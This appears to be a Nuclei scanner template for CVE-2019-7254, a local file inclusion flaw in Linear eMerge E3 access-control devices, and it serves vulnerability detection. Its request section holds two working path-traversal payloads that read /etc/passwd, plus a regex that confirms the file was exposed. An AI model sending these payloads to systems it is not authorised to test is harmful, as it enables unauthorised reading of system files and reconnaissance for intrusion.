39 lines
1.0 KiB
YAML
39 lines
1.0 KiB
YAML
id: CVE-2019-7254
|
|
|
|
info:
|
|
name: eMerge E3 1.00-06 - Local File Inclusion
|
|
author: 0x_Akoko
|
|
severity: high
|
|
description: Linear eMerge E3-Series devices are vulnerable to local file inclusion.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/47616
|
|
- https://applied-risk.com/labs/advisories
|
|
- https://www.applied-risk.com/resources/ar-2019-005
|
|
- http://packetstormsecurity.com/files/155252/Linear-eMerge-E3-1.00-06-Directory-Traversal.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-7254
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2019-7254
|
|
cwe-id: CWE-22
|
|
tags: cve,cve2019,emerge,lfi
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/?c=../../../../../../etc/passwd%00"
|
|
- "{{BaseURL}}/badging/badge_print_v0.php?tpl=../../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/07/08
|